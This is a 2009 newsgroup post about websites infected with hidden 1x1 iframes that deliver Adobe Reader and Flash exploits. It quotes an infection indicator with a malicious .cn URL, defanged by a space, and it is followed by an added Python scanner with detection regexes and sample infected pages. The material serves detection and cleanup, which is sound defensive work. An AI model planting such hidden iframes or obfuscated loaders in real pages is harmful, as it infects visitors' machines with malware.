OT: IFRAME exploit was: Re: Goodbye to copper? [Telecom]
- From: Thad Floryan <thad@xxxxxxxxxxxx>
- Date: Tue, 30 Jun 2009 07:41:47 -0400 (EDT)
On 6/29/2009 7:03 PM, hancock4@xxxxxxxxxxxx wrote:
> [...]
> Someone was fired and arrested for having illegal laptop content, and
> it turned out the content was placed there by malware that slipped
> through anti-virus software. These things seem to happen often, yet
> it seems extremely rare that the perpetrators of such sabotage are
> punished or barriers placed to block overseas submissions.
> I suspect almost all readers of this newsgroup are savvy enough to keep
> their protection software up-to-date and wouldn't be victimized like
> that. But sometimes techies forget that lay people out there don't
> think about those things, especially under the hood stuff like caches,
> and can get burned.
> [...]
Sometimes the "protection" is a misnomer, and I'm referring to anti-virus
programs by the majors. Some of the criminals have developed extremely
clever methods of getting malware onto systems from infected websites that
require no action or clicking on the part of the innocent user.
1000s of websites are being infected since early April 2009 by the
Russian Business Network (RBN, a hacker group) who pays commissions
to infect web sites (mostly with the IFRAME exploit which uses
long-standing bugs with Adobe Reader (even the latest version) and Adobe
Flash). I've fixed several people's websites in just the past 4 weeks,
and it's not clear how the websites became infected (one web site is
running FreeBSD/Apache).
If you see or find something like the following in any of your *.htm*
or *.php files (with a space between "." and "cn" for safety):
"... iframe src="http://hotslotpot. cn/in.cgi?income64"
width=1 height=1 style="visibility: hidden"></iframe ..."
or
"document.write(unescape("
then your site is infected. Though it looks like China is the source,
the RBN manipulates DNS and the sites move around (China, Latvia, and
as of two weeks ago St. Petersburg (Russia)). The exploit itself changes
several times a day which is problematic for antivirus programs -- none of
the major AV programs find it.
Basically, the above IFRAME silently downloads either a PDF or a SWF
file (after interrogating the browser's plugins) and performs a buffer
overflow exploit akin to the Morris Internet Worm of 1988. The exploit
uses Adobe Reader (all versions since at least 6.* up to the latest version)
and executes malware on the user's client system.
The NoScript plugin for Firefox will stop the IFRAME; to install the NoScript
plugin in Firefox:
Tools -> Add-Ons
In the window that pops up, click on "Get Extensions" (LR corner).
In the [Search for add-ons] box, enter NoScript.
Be sure to read the docs since your web browsing experience will be changed.
I'm not aware of similar plugins for other browsers, but disabling scripting
will help.
No system is truly safe from attacks like the above exploit; it affects
Linux, too, per this "no known workaround" report also from April 2009 for
Gentoo:
<http://seclists.org/bugtraq/2009/Apr/0190.html>.
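The post tells site owners to grep their *.htm* and *.php files for a hidden 1x1 iframe or a document.write(unescape( call. Below is an added example of that check as a small scanner; it is not code from the original post or from any project named in it. The regular expressions, the function names (find_indicators, scan_tree, demo_scan) and the sample pages are all constructed for this example, and the iframe target uses the placeholder host badhost.invalid rather than the domain quoted in the post.

```python
import re
import tempfile
from pathlib import Path

# Indicators from the post: an <iframe> pointing at an external URL that is
# either 1x1/0x0 or styled invisible, and an obfuscated
# document.write(unescape(...)) call.  Heuristics are constructed here.
IFRAME_TAG = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*[\"']?(?P<src>https?://[^\"'\s>]+)[^>]*>",
    re.IGNORECASE,
)
TINY_DIMENSION = re.compile(r"\b(width|height)\s*=\s*[\"']?(0|1)\b", re.IGNORECASE)
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
OBFUSCATED_WRITE = re.compile(r"document\.write\s*\(\s*unescape\s*\(", re.IGNORECASE)


def find_indicators(text, own_hosts=()):
    """Return a list of (indicator, detail) tuples found in one file's text.

    own_hosts is an optional allowlist of hostnames whose iframes are
    expected (for example the site's own tracking frame) and are skipped.
    """
    findings = []
    for match in IFRAME_TAG.finditer(text):
        tag = match.group(0)
        src = match.group("src")
        host = re.sub(r"^https?://", "", src).split("/")[0].lower()
        if host in own_hosts:
            continue
        # A visible, normally sized iframe is not by itself suspicious;
        # the injected ones are tiny or explicitly hidden.
        if TINY_DIMENSION.search(tag) or HIDDEN_STYLE.search(tag):
            findings.append(("hidden-iframe", src))
    if OBFUSCATED_WRITE.search(text):
        findings.append(("document.write(unescape)", ""))
    return findings


def scan_tree(root, own_hosts=(), suffixes=(".htm", ".html", ".php")):
    """Walk a document root and map each flagged file path to its findings."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(errors="replace")
            hits = find_indicators(text, own_hosts)
            if hits:
                results[str(path)] = hits
    return results


# Constructed sample pages: one clean, one carrying the hidden iframe
# pattern, one carrying the obfuscated document.write pattern.
CLEAN_PAGE = (
    '<html><body><iframe src="https://www.example.com/widget" '
    'width="300" height="200"></iframe></body></html>'
)
INFECTED_PAGE = (
    "<html><body><p>Hello</p>"
    '<iframe src="http://badhost.invalid/in.cgi?income64" width=1 height=1 '
    'style="visibility: hidden"></iframe></body></html>'
)
OBFUSCATED_PAGE = '<script>document.write(unescape("%3Cscript%3E"))</script>'


def demo_scan():
    """Write the sample pages into a temporary tree and scan it.

    Returns a dict of {file name: findings} so the result is easy to check.
    """
    with tempfile.TemporaryDirectory() as root:
        base = Path(root)
        (base / "index.html").write_text(CLEAN_PAGE)
        (base / "sub").mkdir()
        (base / "sub" / "page.htm").write_text(INFECTED_PAGE)
        (base / "contact.php").write_text(OBFUSCATED_PAGE)
        (base / "notes.txt").write_text(INFECTED_PAGE)  # wrong suffix, skipped
        results = scan_tree(root)
        return {Path(p).name: hits for p, hits in results.items()}


if __name__ == "__main__":
    for name, hits in sorted(demo_scan().items()):
        print(name, hits)
```

Run it against a site's document root with scan_tree("/path/to/htdocs") to get the flagged files; a hit on the hidden-iframe pattern with an unfamiliar host is the same signal the post describes, and the allowlist keeps a site's own legitimate hidden frames out of the report.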